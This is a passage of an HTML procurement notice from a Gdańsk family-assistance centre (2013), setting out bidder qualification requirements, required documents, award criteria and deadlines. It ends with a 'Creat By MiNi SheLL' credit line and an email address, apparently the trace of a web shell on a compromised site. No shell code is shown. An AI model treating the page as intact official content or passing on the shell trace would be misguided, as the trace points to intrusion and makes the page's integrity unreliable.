<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje co najmniej cztery usługi szkoleniowe, każda o wartości nie mniejszej niż  100 tys. zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje sprawnym telefaksem.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje osobami o wymaganych kwalifikacjach, wykształceniu i doświadczeniu w prowadzeniu szkoleń  i spotkań (opisanych w Rozdziale III siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument, z którego wynika upoważnienie wykonawcy do podpisania oferty (oryginał lub poświadczona zgodnie z zasadą reprezentacji za zgodność z oryginałem kopia) lub pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik (oryginał lub poświadczona notarialnie za zgodność                                        z oryginałem kopia).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się w uzasadnionych wypadkach zmiany terminu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie                       w Gdańsku, ul. Konrada Leczkowa 1A, 80-432 Gdańsk - kancelaria, pok. nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Rodzinie                       w Gdańsku, ul. Konrada Leczkowa 1A, 80-432 Gdańsk - kancelaria, pok. nr 4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Systematycznie do celu (Program Operacyjny Kapitał Ludzki 2007 - 2013; Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1). Projekt jest współfinansowany ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com